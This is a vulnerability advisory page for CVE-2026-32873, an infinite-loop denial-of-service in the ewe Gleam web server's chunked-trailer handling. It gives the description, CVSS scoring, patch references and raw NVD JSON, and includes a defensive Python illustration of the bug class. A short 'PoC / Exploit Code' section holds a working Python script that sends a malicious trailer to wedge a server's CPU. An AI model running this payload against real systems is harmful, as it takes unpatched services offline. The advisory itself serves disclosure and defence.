Security Vulnerability Report
CVE-2026-32873 CVSS 7.5 HIGH

CVE-2026-32873

Published: 2026-03-20 02:16:36
Last Modified: 2026-04-16 13:27:25

Description

ewe is a Gleam web server. Versions 0.8.0 through 3.0.4 contain a bug in the handle_trailers function where rejected trailer headers (forbidden or undeclared) cause an infinite loop. When handle_trailers encounters such a trailer, three code paths (lines 520, 523, 526) recurse with the original buffer (rest) instead of advancing past the rejected header (Buffer(header_rest, 0)), causing decoder.decode_packet to re-parse the same header on every iteration. The resulting loop has no timeout or escape — the BEAM process permanently wedges at 100% CPU. Any application that calls ewe.read_body on chunked requests is affected, and this is exploitable by any unauthenticated remote client before control returns to application code, making an application-level workaround impossible. This issue is fixed in version 3.0.5.
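The following Python sketch is an added illustration, not ewe's code and not derived from the patch commits: it is a minimal chunked-trailer handler that reproduces the defect class the description names (CWE-835, a loop whose state never changes) and shows the two things a defender wants in such a parser, namely advancing past a rejected header and failing closed when an iteration consumes no bytes. `FORBIDDEN_TRAILERS`, the `declared` set, the sample trailer bytes and every function name here are constructed assumptions.

```python
# Added illustration (not ewe's code): a minimal chunked-trailer handler that
# shows the CWE-835 defect class described in the advisory, with the buffer
# advance and a forward-progress check a defender would want.
# FORBIDDEN_TRAILERS, the sample bytes and all names here are constructed.

FORBIDDEN_TRAILERS = {"transfer-encoding", "content-length", "host", "trailer"}


class TrailerError(Exception):
    """Raised for malformed trailers or a parser that stops making progress."""


def decode_header_line(buf: bytes):
    """Split one CRLF-terminated line off `buf`.

    Returns (name, value, rest); name is None on the blank line that ends the
    trailer section, and the result is None when no full line is buffered yet.
    """
    end = buf.find(b"\r\n")
    if end < 0:
        return None
    line, rest = buf[:end], buf[end + 2:]
    if line == b"":
        return None, None, rest
    name, sep, value = line.partition(b":")
    if not sep:
        raise TrailerError("malformed trailer line: %r" % line)
    return name.strip().lower().decode("ascii"), value.strip().decode("ascii"), rest


def handle_trailers(buf: bytes, declared: set, advance_on_reject: bool = True):
    """Consume a trailer section and return (accepted, rejected, remaining_bytes).

    `declared` is the set of lowercase names announced in the request's
    Trailer header. With advance_on_reject=False the loop reproduces the bug
    pattern from the advisory: after a rejected header it continues with the
    original buffer instead of `rest`, so the same line would be decoded again
    forever. The progress check turns that hang into an exception.
    """
    accepted, rejected = {}, []
    while True:
        before = len(buf)
        parsed = decode_header_line(buf)
        if parsed is None:
            raise TrailerError("incomplete trailer section")
        name, value, rest = parsed
        if name is None:
            return accepted, rejected, rest
        if name in FORBIDDEN_TRAILERS or name not in declared:
            rejected.append(name)
            buf = rest if advance_on_reject else buf
        else:
            accepted[name] = value
            buf = rest
        if len(buf) >= before:
            # Every iteration must consume bytes; otherwise we are looping in place.
            raise TrailerError("trailer parser made no forward progress")


def hangs_without_guard(buf: bytes, declared: set) -> bool:
    """True if the bug pattern would loop on `buf` (i.e. the progress guard fired)."""
    try:
        handle_trailers(buf, declared, advance_on_reject=False)
    except TrailerError as exc:
        return "progress" in str(exc)
    return False


# Constructed trailer section: one declared trailer, one forbidden header,
# one undeclared header, then the blank line and bytes of a following request.
SAMPLE_TRAILERS = (
    b"Checksum: abc123\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"X-Undeclared: 1\r\n"
    b"\r\n"
    b"next-request"
)

if __name__ == "__main__":
    print(handle_trailers(SAMPLE_TRAILERS, {"checksum"}))
    print("bug pattern would hang:", hangs_without_guard(SAMPLE_TRAILERS, {"checksum"}))
```

The progress check is the generic safeguard for this bug class: a parser loop that is handed the same input it started with will trip it on the very next iteration instead of pinning a scheduler thread, which is the behaviour the advisory describes for a BEAM process.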

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:vshakitskiy:ewe:*:*:*:*:*:*:*:* - VULNERABLE
ewe 0.8.0 - 3.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket

# PoC for CVE-2026-32873
# This script sends a chunked HTTP request with a forbidden trailer
# to trigger the infinite loop in the 'ewe' server.

def trigger_dos(host, port):
    payload = (
        "POST / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Transfer-Encoding: chunked\r\n"
        "\r\n"
        "4\r\n"
        "Test\r\n"
        "0\r\n"
        "Forbidden-Header: value\r\n"  # Malicious trailer
        "\r\n"
    )
    # Create the socket outside the try block so that `finally` cannot
    # reference an unbound name if socket creation itself fails.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.settimeout(5)
        s.connect((host, port))
        s.sendall(payload.encode())
        print("[+] Payload sent. Server CPU should spike to 100%.")
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        s.close()
```

References

https://github.com/vshakitskiy/ewe/commit/8513de9dcdd0005f727c0f6f15dd89f8d626f560 (Patch)
https://github.com/vshakitskiy/ewe/commit/d8b9b8a86470c0cb5696647997c2f34763506e37 (Patch)
https://github.com/vshakitskiy/ewe/security/advisories/GHSA-4w98-xf39-23gp (Exploit, Patch, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32873", "sourceIdentifier": "[email protected]", "published": "2026-03-20T02:16:35.540", "lastModified": "2026-04-16T13:27:24.807", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ewe is a Gleam web server. Versions 0.8.0 through 3.0.4 contain a bug in the handle_trailers function where rejected trailer headers (forbidden or undeclared) cause an infinite loop. When handle_trailers encounters such a trailer, three code paths (lines 520, 523, 526) recurse with the original buffer (rest) instead of advancing past the rejected header (Buffer(header_rest, 0)), causing decoder.decode_packet to re-parse the same header on every iteration. The resulting loop has no timeout or escape — the BEAM process permanently wedges at 100% CPU. Any application that calls ewe.read_body on chunked requests is affected, and this is exploitable by any unauthenticated remote client before control returns to application code, making an application-level workaround impossible. This issue is fixed in version 3.0.5."}, {"lang": "es", "value": "ewe es un servidor web Gleam. Las versiones 0.8.0 a 3.0.4 contienen un error en la función handle_trailers donde los encabezados de tráiler rechazados (prohibidos o no declarados) causan un bucle infinito. Cuando handle_trailers encuentra un tráiler de este tipo, tres rutas de código (líneas 520, 523, 526) recursan con el búfer original (rest) en lugar de avanzar más allá del encabezado rechazado (Buffer(header_rest, 0)), lo que provoca que decoder.decode_packet vuelva a analizar el mismo encabezado en cada iteración. El bucle resultante no tiene tiempo de espera ni escape — el proceso BEAM se atasca permanentemente al 100% de CPU. Cualquier aplicación que llama a ewe.read_body en solicitudes fragmentadas se ve afectada, y esto es explotable por cualquier cliente remoto no autenticado antes de que el control regrese al código de la aplicación, lo que hace imposible una solución alternativa a nivel de aplicación. Este problema está solucionado en la versión 3.0.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-825"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-835"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vshakitskiy:ewe:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.8.0", "versionEndExcluding": "3.0.5", "matchCriteriaId": "9825AC91-47D7-4F40-A582-AB13FF203293"}]}]}], "references": [{"url": "https://github.com/vshakitskiy/ewe/commit/8513de9dcdd0005f727c0f6f15dd89f8d626f560", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/vshakitskiy/ewe/commit/d8b9b8a86470c0cb5696647997c2f34763506e37", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/vshakitskiy/ewe/security/advisories/GHSA-4w98-xf39-23gp", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/vshakitskiy/ewe/security/advisories/GHSA-4w98-xf39-23gp", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}}